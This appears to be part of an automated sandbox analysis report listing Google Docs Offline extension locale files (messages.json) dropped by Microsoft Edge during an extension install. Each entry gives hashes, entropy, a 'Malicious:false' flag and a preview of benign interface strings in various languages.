                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):977
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                                                MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                                                SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                                                SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                                                SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3107
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                                                MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                                                SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                                                SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                                                SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1389
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                                                MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                                                SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                                                SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                                                SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1763
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                                                MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                                                SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                                                SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                                                SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):930
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                                                MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                                                SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                                                SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                                                SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):913
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                                                MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                                                SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                                                SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                                                SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):806
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                                                MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                                                SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                                                SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                                                SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):883
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                                                MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                                                SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                                                SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                                                SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1031
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                                                MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                                                SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                                                SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                                                SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1613
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                                                MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                                                SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                                                SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                                                SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):848
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                                                MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                                                SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                                                SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                                                SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1425
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.461560329690825
